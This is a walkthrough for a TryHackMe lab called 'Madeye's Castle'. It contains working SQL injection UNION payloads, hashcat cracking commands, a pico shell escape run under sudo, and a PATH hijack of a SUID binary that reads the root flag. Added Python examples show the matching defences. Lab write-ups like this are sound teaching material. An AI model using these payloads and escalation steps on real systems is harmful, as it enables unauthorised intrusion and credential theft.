TryHackMe: Madeyes Castle writeup/walkthrough

Writeup/tutorial for the room ‘Madeye’s Castle’ on TryHackMe

Room Link | Medium difficulty

As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.

Deploy the machine and in the meantime, connect to the THM network:

sudo openvpn --config <your_vpn_file>

Task 1: Capture the flags

nmap -A <Machine_IP>
The nmap results show SSH on port 22, a web server on port 80 and SMB on ports 139 and 445.

The nmap result had smb so we can try smbclient on the IP.

smbclient -N //<Machine_IP>/sambashare
ls
get .notes.txt
get spellnames.txt

Reading through the notes gave me two hints. The first is that the owner of the file is not using rockyou.txt, but maybe spellnames.txt.
The other hint is that Hermonine (yep, that’s how it was spelled) loves using a historical text editor.

Going to http://<Machine_IP>:80 shows us the Apache2 Ubuntu default page, but if we view its source, we can see that it is using virtual hosting on hogwartz-castle.thm.

Let’s add the IP and virtual hosting address to /etc/hosts file to see if we can get a webpage.

sudo nano /etc/hosts
# Append the line below
<Machine_IP> hogwartz-castle.thm
10.10.121.218 was the IP for the machine in my room. You should check the IP in the TryHackMe room.

If you go to hogwartz-castle.thm in your browser (Click yes on the prompt bar that shows up to take you to http://hogwartz-castle.thm), you’ll see a login page.

Let’s try SQL injection by entering ' or 1=1 ;-- - in the username field and anything for the password.

It says the following:
“The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection… keep digging”

We have a potential username that we could use.

Sqlmap was able to get me a table name and the database name but it wasn’t able to dump column values.

users table and SQLite database

I moved to burp suite and tried to get the answers manually. I captured the request in burp suite and sent it to repeater.

I right-clicked on the text area and chose the ‘Copy to file’ option from the drop-down menu.

I sent the request to Repeater and tried some SQL injection. If you enter just an apostrophe in the username field, it says internal error, but if you add the comment '-- - it only says that the username or password is incorrect, so our SQL injection is working. Credit to Musyoka Ian, as his writeup was really helpful.

I tried adding the following and it gave me a 500 internal error:

user='+union+select+1--+-&password=a

I kept on adding more numbers and was able to get a 403 error using the following:

user='+union+select+sql,2,3,4--+-&password=a

If you see the right image above, it says 1 in the middle and 4 at the end. I added a string in place of 1 and it printed the string:

user='+union+select+'testing',2,3,4--+-

Now I can try checking the SQL version using (source):

user='+union+select+sqlite_version(),2,3,4--+-&password=a
We can see that the SQLite version is 3.22.0.

To enumerate further, I used the following:

user='+union+select+group_concat(tbl_name),2,3,4+FROM+sqlite_master+WHERE+type='table'+and+tbl_name+NOT+like+'sqlite_%'--+-&password=a
This confirms that a table named users exists, as found in our sqlmap enumeration.

I tried password as the table name for this db:

user='+union+select+group_concat(password),2,3,4+FROM+users--+-&password=a
content for the password table

Using a wordlist, I was able to do a bruteforce attack to find other tables.

The top images show the burp suite bruteforce settings. The bottom images show the 2 other tables content found using this attack.
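The login described above, as an added example that is not part of the original write-up: a string-concatenated SQLite lookup beside its parameterised fix, with a response routine that echoes column 1 the way the castle's error message does. The table layout, column names and sample passwords are assumptions; the page only confirms a four-column users table holding SHA-512 hashes.

```python
import hashlib
import sqlite3

# Constructed in-memory stand-in for the castle's SQLite backend. Column names
# are assumptions; the page only confirms a four-column 'users' table whose
# 'password' column holds unsalted SHA-512 hashes.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, admin INTEGER, notes TEXT)")
    for name, pw in (("Lucas Washington", "example-pass-1"), ("Harry Turner", "example-pass-2")):
        con.execute("INSERT INTO users VALUES (?, ?, 0, '')",
                    (name, hashlib.sha512(pw.encode()).hexdigest()))
    return con

def fetch_user_vulnerable(con, user):
    """Concatenated query: the username field is parsed as SQL. A lone
    apostrophe raises sqlite3.OperationalError (the site's 'internal error')."""
    sql = "SELECT name, password, admin, notes FROM users WHERE name = '" + user + "'"
    return con.execute(sql).fetchone()

def fetch_user_safe(con, user):
    """Parameterised query: the username is bound as a value, never as SQL."""
    sql = "SELECT name, password, admin, notes FROM users WHERE name = ?"
    return con.execute(sql, (user,)).fetchone()

def login(con, user, password, fetch=fetch_user_vulnerable):
    """Mimics the castle's responses, which echo column 1 of whatever row the
    query returned; that echo is what turns a UNION into a data channel."""
    row = fetch(con, user)
    if row is None:
        return "Username or password is incorrect"
    if hashlib.sha512(password.encode()).hexdigest() == row[1]:
        return "Welcome %s" % row[0]
    return "The password for %s is incorrect!" % row[0]
```

Run the page's payloads through `login()` with the default fetch to see the name, the SQLite version or the whole password column come back in the error text; pass `fetch=fetch_user_safe` and every one of them falls through to the generic message.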

I used Sublime Text to remove the extra text, find all instances of commas in the names file and create a wordlist out of it.

After going through the notes.txt file, there was nothing interesting like repeated sentences, but one thing in the columns gave a clue: someone said their password used best64. best64 is a rule in hashcat and john. We can use this rule for word mangling with hashcat to get some passwords from the hashes I just extracted. Earlier in our SMB enumeration, I was able to recover a .notes.txt and a wordlist containing spells, so maybe we can use that wordlist with the best64 rule.

In my passwords file, I used Sublime’s find-all feature to select all commas and just pressed Enter so each hash was on a new line. I copied one of the hashes and used haiti to identify the type of hash. The same can be done with hash-identifier, and they both said SHA-512.

Using haiti, I found that the hashes were SHA-512 and confirmed it with hash-identifier

I created a wordlist using the best64 rule with hashcat.

cp /usr/share/hashcat/rules/best64.rule ./
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule spellnames.txt > wordlist.txt

Using a GTX 1050 4gb and the wordlist I just created with hashcat, I was able to crack the hash instantly.

hashcat -m 1700 madeye-castle-hashes.txt wordlist.txt 

We now have one password but a lot of usernames, so I started a brute-force attack using Intruder in Burp Suite to find the username that matches this password. I sent my captured login POST request to Intruder, copied the names from the file I removed spaces from, pasted them into Burp Suite, highlighted the username area and entered the password.

Add the password we just cracked with hashcat and highlight the area for user

The attack showed that Harry Turner had the greatest response length but when checking the response, it said something about redirecting so I tried logging in manually with Harry Turner and the password we got.

It worked and it said the following:
The password for Harry Turner is incorrect! My linux username is my first name, and password uses best64

#1. User1.txt and User2.txt

Earlier in the nmap scan, we found an open SSH port, so let’s try logging in there. I tried SSH with Harry as the user but it didn’t work, so I tried it with harry (lowercase h) and it logged me in.

ssh harry@<Machine_IP>
<Enter harry's password>
ls
cat user1.txt
sudo -l
user1.txt flag and allowed commands as user harry by invoking another user, hermonine

Going to GTFOBins, I was able to find the command to use for pico to elevate to hermonine’s privileges. Pico is a text editor, and I believe the notes.txt from the SMB enumeration was hinting towards this editor.

sudo -u hermonine /usr/bin/pico
# Press Enter
# Press Ctrl+R
# Press Ctrl+X and then Enter the following commands:
reset; sh 1>&0 2>&0
bash
clear
# After getting a shell with hermonine's privileges, we are still in harry's directory; move to hermonine's directory and get the user2.txt flag.
cd ../hermonine
ls
cat user2.txt

#3. Root.txt

I used the find command to look for other SUID binaries that I could use to elevate privileges. The first one that stood out from the rest was /srv/time-turner/swagger, and the hint for root.txt mentioned that you have to trick time, so it would be a good guess that this has something to do with gaining root.

find / -perm -u=s -type f 2>/dev/null

If you run the swagger file, it asks for a number and you can almost never get it right. If you keep on running the file, it gives different results but if you send the output number of one as the next input, you get it correct!

# There is a space after of in the 'of ' (awk -F 'of ' '{print $2}')
echo '123' | /srv/time-turner/swagger | grep 'of' | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger
The binary is running uname -p when we input the correct number

The above command sends a number to the swagger binary and then greps for ‘of’ so that we only keep the last line (I tried other words, but they were in both lines, so only ‘of’ worked). I separated the text from the number using awk, selected the number and piped it back into the binary. The answer it gives is the output of uname -p, so we can make a malicious uname file, add its folder to the start of the PATH variable so our file is found first, and try to get a shell with root privileges. I tried adding ‘sudo -u root /bin/bash’ to the malicious uname file but it didn’t work, so I tried to get it to print the flag directly instead of getting a root shell.

cd /tmp
echo 'cat /root/root.txt' > uname
chmod 777 uname
ls -la | grep uname
export PATH=/tmp:$PATH
echo $PATH
echo '123' | /srv/time-turner/swagger | grep 'of' | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger
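The weakness the last step relies on is that a privileged program resolves uname through the caller's PATH. As an added example (not part of the original write-up, and not the room's binary), the block below audits a PATH string for entries a privileged program must not trust, shows how a lookup flips to a world-writable directory placed first, and runs a stand-in with an absolute path and a minimal environment instead. The directories, stand-in scripts and TRUSTED_PATH value are constructed for the demonstration.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Fixed search path a privileged program should use instead of inheriting PATH (assumed value).
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

def risky_path_entries(path_value):
    """PATH entries a privileged program must not trust: relative entries and
    world-writable directories, where anyone can drop a file named 'uname'."""
    risky = []
    for entry in path_value.split(os.pathsep):
        if not os.path.isabs(entry):
            risky.append(entry)
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            continue
        if mode & stat.S_IWOTH:  # a sticky /tmp still lets anyone create new files
            risky.append(entry)
    return risky

def resolve(name, path_value):
    """Which file a PATH lookup (what system("uname -p") does) would execute."""
    return shutil.which(name, path=path_value)

def demo():
    """Constructed scenario: a world-writable dir holding a fake 'uname' placed in
    front of a trusted dir holding the legitimate one (both are stand-in scripts)."""
    with tempfile.TemporaryDirectory() as top:
        writable, trusted = os.path.join(top, "tmp"), os.path.join(top, "bin")
        for d in (writable, trusted):
            os.mkdir(d)
            exe = os.path.join(d, "uname")
            with open(exe, "w") as f:
                f.write("#!/bin/sh\necho uname from %s\n" % d)
            os.chmod(exe, 0o755)
        os.chmod(writable, 0o1777)  # mirror /tmp: world-writable and sticky
        os.chmod(trusted, 0o755)
        tainted = writable + os.pathsep + trusted
        # Hardened call: absolute path to the program (through /bin/sh only because
        # the stand-in is a script) plus a minimal environment, so PATH cannot matter.
        out = subprocess.run(["/bin/sh", os.path.join(trusted, "uname"), "-p"],
                             env={"PATH": TRUSTED_PATH}, capture_output=True,
                             text=True, check=True).stdout
        return {"risky": risky_path_entries(tainted),
                "lookup_hijacked": resolve("uname", tainted).startswith(writable),
                "lookup_pinned": resolve("uname", trusted).startswith(trusted),
                "hardened_ran_trusted": out.strip() == "uname from " + trusted}
```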

I would appreciate some claps and leave any responses if you have any questions. Follow me for more write-ups!


I like all things IT but currently focused on being an IT Security Specialist.

Phantom_95